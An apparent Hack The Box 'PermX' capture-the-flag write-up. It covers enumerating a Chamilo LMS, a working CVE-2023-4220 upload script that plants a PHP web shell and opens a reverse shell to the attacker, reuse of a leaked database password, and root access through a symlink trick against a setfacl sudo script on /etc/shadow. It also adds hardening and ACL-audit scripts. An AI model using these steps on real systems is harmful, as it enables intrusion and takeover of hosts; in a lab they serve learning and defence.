This one is also from Season 5. On EASY machines it feels like you often get in just by finding a password somewhere and trying to log in with it.
HTB PermX
nmap
```
# add to hosts
echo "10.129.135.205 permx.htb" | sudo tee -a /etc/hosts
```

```
$ nmap -sC -A permx.htb
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
|_  256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://permx.htb
|_http-server-header: Apache/2.4.52 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
```
- The usual SSH/HTTP setup
http://permx.htb/
- http://permx.htb/
- eLEARNING. The "Loading" spinner just keeps spinning, lol
- Apparently it's wow.js https://wowjs.uk/
- The content lives under pages, including things like the 404 page
- SSI, maybe?
Subdomain enumeration
```
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt \
  -H "Host: FUZZ.permx.htb" -u http://permx.htb/ -fc 302

www   [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 497ms]
lms   [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 286ms]
```

```
echo "10.129.135.205 www.permx.htb" | sudo tee -a /etc/hosts
echo "10.129.135.205 lms.permx.htb" | sudo tee -a /etc/hosts
```
http://lms.permx.htb/
- http://lms.permx.htb/
- http://lms.permx.htb/main/auth/lostPassword.php
- Password reset
- test =>
There is no account with this user and/or e-mail address
- "' OR 1=1; --" => same
- Thought it might be boolean-based SQLi, but no, this is just an off-the-shelf CMS product, not SQLi
Chamilo (CMS)
- Come to think of it, looking more closely at the admin screen it does look like a CMS
- Version unknown
- https://starlabs.sg/advisories/23/23-3368/
- (CVE-2023-3368) Chamilo LMS Unauthenticated Command Injection
- Looks like there's an exploit
- http://lms.permx.htb/main/webservices/additional_webservices.php exists
- https://starlabs.sg/advisories/23/23-3368/#proof-of-concept
- There's PoC code, so let's try it
```
cat > exploit.py
python3 exploit.py -u http://lms.permx.htb/ -c 'id > /tmp/pwned'
An error has occured, URL is not vulnerable: http://lms.permx.htb/
```
Nope, not this one
- https://starlabs.sg/advisories/23/23-3533/
- (CVE-2023-3533) Chamilo LMS Unauthenticated Remote Code Execution via Arbitrary File Write
- There are others too
- This one also has PoC code, so let's take a look
```
python3 exploit2.py -u http://lms.permx.htb/ rce -p system id
Overwriting session file at: ../../../../../../../../tmp/sess_sJY7EXvdQiMhPRqe9RGIwoF29l4geYiM
Setting ch_sid=sJY7EXvdQiMhPRqe9RGIwoF29l4geYiM
Invoking system() with arguments: id
Found data:
URL not vulnerable: http://lms.permx.htb/
```
Not this one either
```
msfconsole
msf6 > search CVE-2023-34960
msf6 > use exploit/linux/http/chamilo_unauth_rce_cve_2023_34960
...
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. No valid response received from the target. "set ForceExploit true" to override check result.
```
Not this one either, hmm
Is Indexes turned on?
- The directory index... shows everything
- http://lms.permx.htb/web/
- http://lms.permx.htb/app/
- php files get executed, but yml files and the like can all be downloaded
- http://lms.permx.htb/app/config/
- parameters.yml.dist
```
parameters:
    database_driver: pdo_mysql
    database_host: 127.0.0.1
    database_port: ~
    database_name: chamilo111
    database_user: root
    database_password: root
    mailer_transport: smtp
    mailer_host: 127.0.0.1
    mailer_user: ~
    mailer_password: ~
```
Doesn't look useful. There seems to be a lot more here, so let's fuzz it
```
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://lms.permx.htb/FUZZ

.htaccess       [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 251ms]
                [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 501ms]
.hta            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 2000ms]
.htpasswd       [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 4703ms]
app             [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 440ms]
bin             [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 249ms]
certificates    [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 250ms]
documentation   [Status: 301, Size: 322, Words: 20, Lines: 10, Duration: 249ms]
favicon.ico     [Status: 200, Size: 2462, Words: 3, Lines: 2, Duration: 251ms]
index.php       [Status: 200, Size: 19356, Words: 4910, Lines: 353, Duration: 282ms]
LICENSE         [Status: 200, Size: 35147, Words: 5836, Lines: 675, Duration: 253ms]
main            [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 292ms]
plugin          [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 249ms]
robots.txt      [Status: 200, Size: 748, Words: 75, Lines: 34, Duration: 272ms]
server-status   [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 250ms]
src             [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 305ms]
vendor          [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 251ms]
web.config      [Status: 200, Size: 5780, Words: 1119, Lines: 107, Duration: 250ms]
web             [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 265ms]
```
Suspicious-looking ones
- http://lms.permx.htb/certificates/
- Login form
- http://lms.permx.htb/documentation/changelog.html
- Chamilo 1.11.24, so the version is confirmed
- In other words, not a version affected by those major vulnerabilities
CVE-2023-4220/4224 BigUpload
This one needs a learner account
- https://www.cve.org/CVERecord?id=CVE-2023-4224
- https://starlabs.sg/advisories/23/23-4224/

This one doesn't
- https://www.cve.org/CVERecord?id=CVE-2023-4220
- https://github.com/charlesgargasson/CVE-2023-4220
```
$ cat exploit.sh
#!/bin/bash
HOST='http://lms.permx.htb'
CMD='id'
URL_UPLD='main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
URL_FILE='main/inc/lib/javascript/bigupload/files/rce.php'
cat <<'EOF'>/tmp/rce.php
<?php $a=popen(base64_decode($_REQUEST["aoOoy"]),'r');while($b=fgets($a,2048)){echo $b;ob_flush();flush();}pclose($a); ?>
EOF
curl -F 'bigUploadFile=@/tmp/rce.php' "$HOST/$URL_UPLD"
CMD=$(echo $CMD|base64 -w0| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")
curl "$HOST/$URL_FILE?aoOoy=$CMD"
```

```
└─$ sh exploit.sh
The file has successfully been uploaded.uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
It worked!
```
└─$ head exploit.sh
#!/bin/bash
HOST='http://lms.permx.htb'
CMD='bash -c "bash -i >& /dev/tcp/10.10.16.23/4444 0>&1"'
```

```
www-data@permx:/var/www/chamilo/main/inc/lib/javascript/bigupload/files$ whoami
www-data
www-data@permx:/var/www$ python3 -c 'import pty;pty.spawn("/bin/bash")'
```
www-data => mtz
```
www-data@permx:/var/www$ ls -la /home
total 12
drwxr-xr-x  3 root root 4096 Jan 20 18:10 .
drwxr-xr-x 18 root root 4096 Jul  1 13:05 ..
drwxr-x---  4 mtz  mtz  4096 Jun  6 05:24 mtz
```
- /var/www/chamilo/app/config/configuration.php
```
$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
```
So there's a DB password, but now what...

```
ssh mtz@permx.htb
mtz@permx.htb's password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-113-generic x86_64)
...
mtz@permx:~$ whoami
mtz
mtz@permx:~$ cat user.txt
XXXX
```
I'm in
sudo
```
mtz@permx:~$ sudo -l
Matching Defaults entries for mtz on permx:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User mtz may run the following commands on permx:
    (ALL : ALL) NOPASSWD: /opt/acl.sh
```
The classic sudo escape
```
mtz@permx:~$ cat /opt/acl.sh
#!/bin/bash

if [ "$#" -ne 3 ]; then
    /usr/bin/echo "Usage: $0 user perm file"
    exit 1
fi

user="$1"
perm="$2"
target="$3"

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
    /usr/bin/echo "Access denied."
    exit 1
fi

# Check if the path is a file
if [ ! -f "$target" ]; then
    /usr/bin/echo "Target must be a file."
    exit 1
fi

/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"
```
- What on earth is setfacl
- https://atmarkit.itmedia.co.jp/ait/articles/1808/23/news026.html
- https://www.mtioutput.com/entry/chmod-setfacl-differ
- It's a command for manipulating ACLs (I had no idea!)
- It attaches extended permissions (a + shows up in ls)
```
sudo /opt/acl.sh root rwx /home/mtz/vi
```
An invocation like that is possible, but the target path is restricted: it has to start with "/home/mtz/" and must not contain "..". On top of that it checks that the path is a file, presumably as a symlink countermeasure (though `-f` follows symlinks, so it doesn't actually block them).
- I'd like to somehow make /opt/acl.sh editable
- /home/mtz/ is mandatory
- .. can't be used
- So get around it with a symlink
- ln -s / /home/mtz/root
- setfacl /home/mtz/root/shadow
- Write in root's password
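For the fix side, here is a hardened version of the checks in /opt/acl.sh, written as an added example (it is not the script from the box). It resolves the path with realpath before the prefix test, so a symlink inside the home directory no longer walks out of it. ALLOWED_BASE, check_user, check_perm and check_target are names I chose, and it assumes GNU coreutils realpath with -e.

```shell
#!/bin/sh
# Added example: a hardened replacement for the checks in /opt/acl.sh.
# The original compares the *lexical* path against /home/mtz/*, so a
# symlink inside the home directory (ln -s / /home/mtz/root) escapes it.
# Here the path is resolved with realpath(1) first and the resolved path
# is what gets tested. ALLOWED_BASE is overridable so the check can be
# exercised in a scratch directory (assumes GNU coreutils realpath -e).
ALLOWED_BASE="${ALLOWED_BASE:-/home/mtz}"

# user name: lowercase letters, digits, _ and - only (no ':' or metachars)
check_user() {
    case "$1" in ''|*[!a-z0-9_-]*) return 1 ;; esac
    return 0
}

# permission string: only r, w, x and -
check_perm() {
    case "$1" in ''|*[!rwx-]*) return 1 ;; esac
    return 0
}

# target: a regular, non-symlink file whose *resolved* path is under the
# *resolved* ALLOWED_BASE
check_target() {
    target=$1
    # keep the original lexical checks as a first filter
    case "$target" in "$ALLOWED_BASE"/*) ;; *) return 1 ;; esac
    case "$target" in *..*) return 1 ;; esac
    # -e: every component must exist, so dangling links fail here
    real=$(realpath -e -- "$target" 2>/dev/null) || return 1
    base=$(realpath -e -- "$ALLOWED_BASE" 2>/dev/null) || return 1
    # the symlink escape is caught here: /home/mtz/root/etc/shadow -> /etc/shadow
    case "$real" in "$base"/*) ;; *) return 1 ;; esac
    # the target itself must not be a symlink, and must be a regular file
    [ ! -L "$target" ] && [ -f "$real" ] || return 1
    return 0
}

# same CLI as the original; only acts when three arguments are given
if [ "$#" -eq 3 ]; then
    if check_user "$1" && check_perm "$2" && check_target "$3"; then
        # apply the ACL to the resolved path, not the user-supplied string
        /usr/bin/setfacl -m u:"$1":"$2" "$(realpath -e -- "$3")"
    else
        echo "Access denied."
        exit 1
    fi
fi
```

A race between the check and the setfacl call still exists if the caller can swap the link in between, so a sudo rule like this is best avoided altogether rather than patched.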
```
mtz@permx:~$ ln -s / root
mtz@permx:~$ sudo /opt/acl.sh mtz rwx /home/mtz/root/etc/shadow
mtz@permx:~$ ls -la /etc/shadow
-rw-rwx---+ 1 root shadow 1119 Jul  9 00:06 /etc/shadow
mtz@permx:~$ getfacl /etc/shadow
getfacl: Removing leading '/' from absolute path names
# file: etc/shadow
# owner: root
# group: shadow
user::rw-
user:mtz:rwx
```
- For some reason the permission expires after about 3 minutes...
- It seems to get reset, so be quick about it
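The reset above is the box cleaning up; a defender watching for the same thing can read getfacl output and flag named-user or named-group entries that carry write access, which is exactly what the `user:mtz:rwx` line on /etc/shadow is. This is an added example, not part of the writeup; find_foreign_write_acls and scan_paths are my names, and SAMPLE is constructed to mirror the getfacl output above.

```shell
#!/bin/sh
# Added example: spot ACL entries that hand a named user or group write
# access, which is what "setfacl -m u:mtz:rwx /etc/shadow" leaves behind.
# Reads getfacl(1) output on stdin and prints "file type name perms" for
# every named entry whose permission bits contain w.
find_foreign_write_acls() {
    awk '
        /^# file: / { file = substr($0, 9) }        # "# file: /etc/shadow"
        /^(user|group):[^:]+:[rwx-]+/ {             # named entries only
            split($0, f, ":")                       # f[1]=type f[2]=name f[3]=perms
            sub(/[ \t].*/, "", f[3])                # drop any "#effective:" tail
            if (f[3] ~ /w/) print file, f[1], f[2], f[3]
        }
    '
}

# Run getfacl over real files; -p keeps absolute paths in the "# file:" header.
scan_paths() {
    getfacl -p "$@" 2>/dev/null | find_foreign_write_acls
}

# Constructed sample in the shape of the getfacl output seen on the box.
SAMPLE='# file: /etc/shadow
# owner: root
# group: shadow
user::rw-
user:mtz:rwx
group::r--
mask::rwx
other::---

# file: /etc/passwd
# owner: root
# group: root
user::rw-
group::r--
group:audit:r--
other::r--'

# With no arguments run on the sample; with paths, audit those files.
if [ "$#" -eq 0 ]; then
    printf '%s\n' "$SAMPLE" | find_foreign_write_acls
else
    scan_paths "$@"
fi
```

On a live host something like `scan_paths /etc/shadow /etc/passwd /etc/sudoers` from a cron job gives the same alert the box's cleanup is reacting to.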
```
# any password will do
mkpasswd -m sha-512 passwd
$6$sYeguGCxuj27fXWi$11KdBNmu2T6gy1.E0STz1x26/QQdN4t05S2eAAsj57b0PrWExNtshi3L98aVW3Zkl2nXbKEewyOJcqZFoLRPL1
```

```
ln -s / /home/mtz/root
sudo /opt/acl.sh mtz rwx /home/mtz/root/etc/shadow
vi /etc/shadow
```

```
root@permx:/home/mtz# whoami
root
root@permx:/home/mtz# cat /root/root.txt
XXXX
```
GJ!